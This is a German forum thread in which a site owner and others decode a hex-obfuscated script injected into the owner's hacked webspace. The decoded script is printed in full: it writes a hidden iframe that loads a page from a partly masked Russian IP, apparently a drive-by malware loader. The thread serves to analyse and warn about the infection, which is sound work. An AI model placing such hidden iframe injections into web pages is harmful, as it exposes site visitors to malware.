Achsoooo na und ich hab mich schon gewundert... *mal kurz Router abschalt und weiter probier*der Sring orginal ist ohne Leerzeichen (nicht so wie ins Gremlins Lösung)
Achsoooo na und ich hab mich schon gewundert... *mal kurz Router abschalt und weiter probier*der Sring orginal ist ohne Leerzeichen (nicht so wie ins Gremlins Lösung)
Diskutiere nie mit Idioten - sie holen Dich auf ihr Niveau und schlagen Dich dort mit Erfahrung!
Hab den Code geknackt xD war ein HEX String der zu einem normalen ascii Text macht dabei rausgekommen ist folgendes:
Code:<SCRIPT>window.status='Done';document.write('<iframe name=76acc18cc9 src=\'http://77.***.133.188/.if/go.html?'+Math.round(Math.random()*130424)+'a67dd1f0acb\' width=476 height=274 style=\'display: none\'></iframe>')</SCRIPT>
Die IP die aufgerufen wird gehört zu einem Rechner in Russland
hab 3 Zahlen weggemacht damit es keiner aufruft ^^
Diskutiere nie mit Idioten - sie holen Dich auf ihr Niveau und schlagen Dich dort mit Erfahrung!
Danke,
und was war auf dem server, irgend ein virus??
Ich habe ihn nicht aufgerufen, zu gefährlich, aber ich gehe davon aus.
was mich immer noch wunndert ist woher kommt das in deine datei bwz andere dateien , wenn du es nicht reingemacht hast ??
weil von sowas habe ich 0 PLAN
mfg
adi
ganz einfach, da hat jemand meine webspace gehackt, und noc hwas , mein passwort war nicht sehr einfach zu erraten, mit sehr vielen sonderzeichen.
Wie man sieht, es kann wirklich jeden treffen.